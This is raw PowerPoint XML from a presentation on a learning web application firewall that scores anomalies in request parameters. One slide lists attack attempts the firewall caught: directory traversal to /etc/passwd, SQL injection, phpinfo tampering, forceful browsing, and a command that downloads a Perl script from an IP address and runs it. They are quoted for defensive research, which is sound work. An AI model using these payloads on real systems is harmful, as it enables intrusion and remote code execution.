                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>an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observed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parameter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value</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL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𝐴𝑛𝑜𝑚𝑎𝑙𝑦</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                          <a:latin typeface="Cambria Math"/>
                        </a:rPr>
                        <m:t> </m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                          <a:latin typeface="Cambria Math"/>
                        </a:rPr>
                        <m:t>𝑠𝑐𝑜𝑟𝑒</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="pl-PL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l-PL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 ∈</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                              <a:latin typeface="Cambria Math"/>
                              <a:ea typeface="Cambria Math"/>
                            </a:rPr>
                            <m:t>𝑀𝑜𝑑𝑒𝑙𝑠</m:t>
                          </m:r>
                        </m:sub>
                        <m:sup/>
                        <m:e>
                          <m:r>
                            <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                              <a:latin typeface="Cambria Math"/>
                            </a:rPr>
                            <m:t> (1−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r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>where</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t>:</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL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l-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> - </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>probability</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>an</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>observed</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> for a </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" err="1" smtClean="0"/>
                  <a:t>given</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
                  <a:t> model m</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>n – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>models</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0"/>
                </a:br>
                <a:endParaRPr lang="pl-PL" b="0" dirty="0" smtClean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2468" r="-3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7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Introduction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72% of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>interviewed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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>had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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacked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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>preceeding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> 24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>months</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>. Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Barracuda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Networks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>outnumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>/OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> by ratio 1:10 (Microsoft Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Report)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More than 13% of all reviewed sites can be completely compromised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>automatically.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>49% of web applications contain vulnerabilities of high risk level (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Urgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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Critical) detected during automatic scanning. However, detailed manual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>assessment by a white box method allows to detect these high </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerabilities with the probability reaching 80-96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>”. (Web Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Consortium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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24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Results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Dataset</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>3 independent  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>production</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>total</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>3853 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>analysed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>total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values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> 527070</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>queries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73 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>collected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> from „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP-delivered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacks against web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>” Database (http://www.i-pi.com/HTTP-attacks-JoCN-2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>/)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52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Results</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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74101"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611560" y="1412776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52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Types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> by WAF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Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Learning WAF (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>):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../../../../../../../../../../../../../../../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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</a:rPr>
              <a:t>passwd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/>
              <a:t>(Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Tampering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)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' or 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–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/>
              <a:t>(SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpMyAdmin2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config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</a:rPr>
              <a:t>config.inc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Forceful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Browsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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/../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/system32/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/w3svc1/ex000121.log</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /tmp;rm -rf font-nix;wget 67.58.79.162/font-nix;perl font-nix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35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Summary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 smtClean="0"/>
              <a:t>Benefits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of a Learning WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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easily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>improve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Requires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>minimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>efforts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>supplement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>exisiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>systems</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> TO DO…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>models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take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>consideration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>correlations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parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (not to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>treat</a:t>
            </a:r>
            <a:r>
